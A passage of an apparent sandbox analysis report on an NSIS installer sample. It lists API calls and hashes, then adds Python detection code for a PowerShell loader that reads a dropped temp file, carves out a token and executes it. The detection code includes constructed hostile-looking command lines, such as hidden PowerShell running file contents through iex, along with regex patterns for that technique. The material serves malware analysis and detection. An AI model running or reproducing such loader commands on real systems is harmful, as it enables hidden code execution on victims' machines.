                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: MessageSend$Timeout
                          • String ID: !
                          • API String ID: 1777923405-2657877971
                          • Opcode ID: 6b7a83c98c9a4dd998c630d8be00bc685075749139b64b10b53530248dbe3f14
                          • Instruction ID: 290ea32ff0ec2f544a370e30947e4a0d8eefe4f8a949274a77cee2e27ce3354c
                          • Opcode Fuzzy Hash: 6b7a83c98c9a4dd998c630d8be00bc685075749139b64b10b53530248dbe3f14
                          • Instruction Fuzzy Hash: E121B471948209BFEF05AFA4DA86AAE7FB1EF44304F20447EF105B61D1C6B98681DB18

                          Control-flow Graph: rendered graph image not captured (function at 4024a5; calls 402c5e, 402cee, lstrlenA, 402c3c, 403168, RegSetValueExA, RegCloseKey)
                          APIs
                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsw42F9.tmp,00000023,00000011,00000002), ref: 004024EE
                          • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsw42F9.tmp,00000000,00000011,00000002), ref: 0040252E
                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsw42F9.tmp,00000000,00000011,00000002), ref: 00402612
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: CloseValuelstrlen
                          • String ID: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp
                          • API String ID: 2655323295-2773041337
                          • Opcode ID: 994313b24f6ecc10b85d58a81230281b56cede14dcfa62075e128b500db5823b
                          • Instruction ID: 6d397742f2669f62c509e0fee011734c1b12f88961c408bb43c0d560fe134550
                          • Opcode Fuzzy Hash: 994313b24f6ecc10b85d58a81230281b56cede14dcfa62075e128b500db5823b
                          • Instruction Fuzzy Hash: DA119371A04118BFEF10AFB59E49AAE7A74EB54314F20443FF505F61D1C6B98D829A18

                          Control-flow Graph: rendered graph image not captured (function at 405d0d; calls 40628d, 405cb8, 406587, lstrlenA, 406620, 405c66, 405c1f, GetFileAttributesA)
                          APIs
                            • Part of subcall function 0040628D: lstrcpynA.KERNEL32(0000000C,0000000C,00000400,0040357B,Swindlery Setup,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040629A
                            • Part of subcall function 00405CB8: CharNextA.USER32(?,?,C:\,0000000C,00405D24,C:\,C:\,77193410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,77193410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\vfhlZ0vrbe.exe"), ref: 00405CC6
                            • Part of subcall function 00405CB8: CharNextA.USER32(00000000), ref: 00405CCB
                            • Part of subcall function 00405CB8: CharNextA.USER32(00000000), ref: 00405CDF
                          • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,77193410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,77193410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\vfhlZ0vrbe.exe"), ref: 00405D60
                          • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,77193410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,77193410,C:\Users\user\AppData\Local\Temp\), ref: 00405D70
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                          • String ID: C:\$C:\Users\user\AppData\Local\Temp\
                          • API String ID: 3248276644-2214159804
                          • Opcode ID: 308fadea3a0b968ed56b92214e6bc0f27c5543f8f515069d12591bb602a569a4
                          • Instruction ID: 935e679f1c1c714b0e3911a5d698b339edd04cd04073ee9c7d5fe0644536c501
                          • Opcode Fuzzy Hash: 308fadea3a0b968ed56b92214e6bc0f27c5543f8f515069d12591bb602a569a4
                          • Instruction Fuzzy Hash: FCF02831105E511AE62233352C0DAAF1A44CE93364719857FF855B12D2DB3C89479D7D
                          APIs
                          • GetTickCount.KERNEL32 ref: 00405E63
                          • GetTempFileNameA.KERNELBASE(0000000C,?,00000000,?,?,004033D6,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008), ref: 00405E7D
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: CountFileNameTempTick
                          • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                          • API String ID: 1716503409-944333549
                          • Opcode ID: 785ee4e59b25deabe338fa9c65985dff7b7c4930a860df7800de2eab11a71ed7
                          • Instruction ID: 3970c65dfeb72379d163dc795dbdbe3f0392b49dfad0d6f3c406a96719355742
                          • Opcode Fuzzy Hash: 785ee4e59b25deabe338fa9c65985dff7b7c4930a860df7800de2eab11a71ed7
                          • Instruction Fuzzy Hash: A0F082363042046BDB109F56EC04B9B7B9CEF91750F10803BF9889B180D6B099558798
                          APIs
                            • Part of subcall function 00405CB8: CharNextA.USER32(?,?,C:\,0000000C,00405D24,C:\,C:\,77193410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,77193410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\vfhlZ0vrbe.exe"), ref: 00405CC6
                            • Part of subcall function 00405CB8: CharNextA.USER32(00000000), ref: 00405CCB
                            • Part of subcall function 00405CB8: CharNextA.USER32(00000000), ref: 00405CDF
                          • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401632
                            • Part of subcall function 00405897: CreateDirectoryA.KERNELBASE(?,?), ref: 004058D9
                          • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Reunified\Betrkkene,00000000,00000000,000000F0), ref: 00401661
                          Strings
                          • C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Reunified\Betrkkene, xrefs: 00401656
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                          • String ID: C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Reunified\Betrkkene
                          • API String ID: 1892508949-929867550
                          • Opcode ID: 2c20d4c644fd78e3d1f4ce17685fc2594679ef97166e32e1fcd970dca5652f26
                          • Instruction ID: 0b6d2b43488905cbaa276f6c0cac56371e043703d2fe031d841b632f48d4a949
                          • Opcode Fuzzy Hash: 2c20d4c644fd78e3d1f4ce17685fc2594679ef97166e32e1fcd970dca5652f26
                          • Instruction Fuzzy Hash: 3911E331904240AFDF307F754D41A7F26B0DA56724B68497FF891B22E2C63D49439A6E
                          APIs
                          • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,Remove folder: ,?,?,?,?,00000000,?,?,00406432,80000002), ref: 004061BA
                          • RegCloseKey.KERNELBASE(?,?,00406432,80000002,Software\Microsoft\Windows\CurrentVersion,?,Remove folder: ,?,?,Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\), ref: 004061C5
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: CloseQueryValue
                          • String ID: Remove folder:
                          • API String ID: 3356406503-1958208860
                          • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                          • Instruction ID: 11b83480b68dea0a629fd90b3ddfe96452127a043c469d5d543a73811e09722f
                          • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                          • Instruction Fuzzy Hash: 9A01D472500209ABCF22CF10CD05FDB3FA8EF54354F01403AF915A6191D774CA64CB94
                          APIs
                          • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025E7
                          • RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 004025FA
                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsw42F9.tmp,00000000,00000011,00000002), ref: 00402612
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: Enum$CloseValue
                          • String ID:
                          • API String ID: 397863658-0
                          • Opcode ID: 4c7cffd82a1a6ff72a98075f8b8725b621981bbded826c54beb525449930f380
                          • Instruction ID: cba12c4e2b45f70554d055d57f05f50eb42167a32c5ceb359e12f1818167ad50
                          • Opcode Fuzzy Hash: 4c7cffd82a1a6ff72a98075f8b8725b621981bbded826c54beb525449930f380
                          • Instruction Fuzzy Hash: 4E01BC71604204AFEB218F54DE98ABF7AACEB40348F10443FF005A61C0DAB84A459A29
                          APIs
                            • Part of subcall function 00405DFB: GetFileAttributesA.KERNELBASE(?,?,00405A13,?,?,00000000,00405BF6,?,?,?,?), ref: 00405E00
                            • Part of subcall function 00405DFB: SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405E14
                          • RemoveDirectoryA.KERNELBASE(?,?,?,00000000,00405BF6), ref: 00405A22
                          • DeleteFileA.KERNELBASE(?,?,?,00000000,00405BF6), ref: 00405A2A
                          • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405A42
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: File$Attributes$DeleteDirectoryRemove
                          • String ID:
                          • API String ID: 1655745494-0
                          • Opcode ID: 043921b8c917d9d62ea668da32ed729a983a4b9cb196bdfb72cf9d57704c1844
                          • Instruction ID: 6cbbeebccd270b92d1032a3138f2130d4a861fe222b861409a1048e863718438
                          • Opcode Fuzzy Hash: 043921b8c917d9d62ea668da32ed729a983a4b9cb196bdfb72cf9d57704c1844
                          • Instruction Fuzzy Hash: 7FE0E531314A915BC3105774AA8CA5B2A98DFC2315F050A3AF4A2B10C0CB78444A8F6D
                          APIs
                          • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402573
                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsw42F9.tmp,00000000,00000011,00000002), ref: 00402612
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: CloseQueryValue
                          • String ID:
                          • API String ID: 3356406503-0
                          • Opcode ID: dcdcdbe78ff3a909b69e1bc964059ef71c3d22f6032091b40b69186da43a403e
                          • Instruction ID: 97fa2cc47e124225833d1b044c3f4c0ff185fe65e0aec06a9837656ed07e9740
                          • Opcode Fuzzy Hash: dcdcdbe78ff3a909b69e1bc964059ef71c3d22f6032091b40b69186da43a403e
                          • Instruction Fuzzy Hash: 6511C171905205EFDF20CF60CA985AE7AB4EF01344F20883FE446B72C0D6B88A45DA1A
                          APIs
                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                          • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID:
                          • API String ID: 3850602802-0
                          • Opcode ID: a4ad1f289275d07b12332ff40cf82794c587183748ad10ec12a076e6d131a720
                          • Instruction ID: 80ce8cba2e1b90c3c9584b4bf9ae45de9eb83361fcac52349235150bfd3c5ac5
                          • Opcode Fuzzy Hash: a4ad1f289275d07b12332ff40cf82794c587183748ad10ec12a076e6d131a720
                          • Instruction Fuzzy Hash: C801F4317242209BE7295B399D08B6A36D8E710754F50823FF995F71F1E678CC028B5C
                          APIs
                          • CreateDirectoryA.KERNELBASE(?,?), ref: 004058D9
                          • GetLastError.KERNEL32 ref: 004058E7
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: CreateDirectoryErrorLast
                          • String ID:
                          • API String ID: 1375471231-0
                          • Opcode ID: 3953c50c5734a5342b3d9bd696b660d903f899823d07f085df3ad9df62cd1170
                          • Instruction ID: 6d4ac730157cfa02be50de44a6d7979ff339f577f95dd1204a0ac4d64297c34f
                          • Opcode Fuzzy Hash: 3953c50c5734a5342b3d9bd696b660d903f899823d07f085df3ad9df62cd1170
                          • Instruction Fuzzy Hash: A3F0F971C0024DDADB00DFA4D5487DEBBB4AF04305F00802AD841B6280D7B882588B99
                          APIs
                          • ShowWindow.USER32(00000000,00000000), ref: 00401F08
                          • EnableWindow.USER32(00000000,00000000), ref: 00401F13
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: Window$EnableShow
                          • String ID:
                          • API String ID: 1136574915-0
                          • Opcode ID: c55ef19b1d155cac422469f2929527eb9f7a60a7667ba4af7f0f003dd8d3c6d7
                          • Instruction ID: ee44cb40e53ee45f72a0237e1ac7dd9bbdf9d48109a1395b289766a98c9c438f
                          • Opcode Fuzzy Hash: c55ef19b1d155cac422469f2929527eb9f7a60a7667ba4af7f0f003dd8d3c6d7
                          • Instruction Fuzzy Hash: C9E04872A082049FEF64EBA4FE9556F77F4EB50365B20447FE101F11C2DA7849428A5D
                          APIs
                          • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042BC90,?,"$Lotteris=gc -raw ',"$Lotteris=gc -raw ',?, for va",00000000), ref: 0040594F
                          • CloseHandle.KERNEL32(?), ref: 0040595C
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: CloseCreateHandleProcess
                          • String ID:
                          • API String ID: 3712363035-0
                          • Opcode ID: f2e48875b6aa7a4f82b92d961b6a232b94f4984d6ef5c684ccb1095c4447d295
                          • Instruction ID: 59d3833cbd0ccaca5dcead9257bf18f7f56651039fadea8639d530792baa2c48
                          • Opcode Fuzzy Hash: f2e48875b6aa7a4f82b92d961b6a232b94f4984d6ef5c684ccb1095c4447d295
                          • Instruction Fuzzy Hash: 4DE09AB4A00209BFFB109F65AD09F7B776CE704714F418425B914F2151EB7498148A7C
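The CreateProcessA record above carries the launch command the installer hands to powershell.exe: read a dropped file with gc -raw, carve a three-character slice out of it with SubString and invoke that slice as a command through the call operator, so the cmdlet name never appears on the command line. The Python below is an added example, not code from the Joe Sandbox report or from the analysed sample: it scores process-creation command lines for that pattern and shows how to recover the carved cmdlet name from the dropped file. Every command line, path, variable name and the offset 9000 in it are constructed for the example; the values for this sample are in the report's own process tree, not in this block.

```python
"""Score process-creation command lines for the "read file, carve a token,
invoke it" PowerShell launch pattern and recover the carved cmdlet name.

Added example for illustration; not code from the Joe Sandbox report or
from the analysed sample. All command lines, paths, variable names and the
offset 9000 below are constructed for the example.
"""
import re
from typing import Dict, List, Optional, Tuple

# One regex per step of the launch pattern. Each is a heuristic; tune the
# verdict rules below to the noise level of your own telemetry.
INDICATORS: Dict[str, re.Pattern] = {
    # Window hidden from the user.
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?", re.I),
    # Whole file slurped as one string (gc/cat/type are Get-Content aliases).
    "read_raw_file": re.compile(r'\b(?:gc|cat|type|get-content)\b[^;"]*?-raw', re.I),
    # Script body lives in a user-writable temp directory.
    "temp_path": re.compile(r"\\appdata\\local\\temp\\|\\windows\\temp\\", re.I),
    # A 1-4 character slice: long enough for "iex", too short to be data.
    "short_substring": re.compile(r"\.substring\(\s*\d+\s*,\s*[1-4]\s*\)", re.I),
    # Call operator (. or &) applied to a variable that holds the command name.
    "dynamic_invoke": re.compile(r"[.&]\s*\$\w+\s*\(\s*\$\w+"),
    # The plain form of the same thing.
    "explicit_iex": re.compile(r"\biex\b|invoke-expression", re.I),
}

POWERSHELL = re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.I)


def analyze(cmdline: str) -> Dict[str, object]:
    """Return the matched indicator names and a verdict for one command line."""
    if not POWERSHELL.search(cmdline):
        return {"indicators": [], "verdict": "benign"}
    hits: List[str] = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    executes_file = "dynamic_invoke" in hits or "explicit_iex" in hits
    if executes_file and "read_raw_file" in hits:
        verdict = "suspicious"  # file content becomes code
    elif len(hits) >= 2:
        verdict = "review"
    else:
        verdict = "benign"
    return {"indicators": hits, "verdict": verdict}


def carve_cmdlet(cmdline: str) -> Optional[Tuple[str, int, int]]:
    """Extract (path, offset, length) of the SubString the script carves its
    command name from, so an analyst can pull the same characters."""
    m_path = re.search(r"-raw\s+'([^']+)'", cmdline, re.I)
    m_sub = re.search(r"\.substring\(\s*(\d+)\s*,\s*(\d+)\s*\)", cmdline, re.I)
    if not (m_path and m_sub):
        return None
    return m_path.group(1), int(m_sub.group(1)), int(m_sub.group(2))


def recover_token(payload_text: str, offset: int, length: int) -> str:
    """Apply the script's own slice to the decoded file content. SubString
    indexes characters of the decoded string, not file bytes, so decode the
    dropped file the way Get-Content would before slicing it."""
    return payload_text[offset:offset + length]


# Constructed command lines (not from the report).
SAMPLE_CMDLINES = [
    r'''powershell.exe -windowstyle hidden "$Alpha=gc -raw 'C:\Users\user\AppData\Local\Temp\Foo\bar.dat';$Beta=$Alpha.SubString(9000,3);.$Beta($Alpha) "''',
    r"powershell.exe -NoProfile -Command Get-ChildItem C:\Temp",
    r'"C:\Windows\SysWOW64\msiexec.exe"',
    r'''powershell.exe -c "$x=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\z.txt'; iex $x"''',
]

# Constructed stand-in for the dropped file: 9000 characters of filler with
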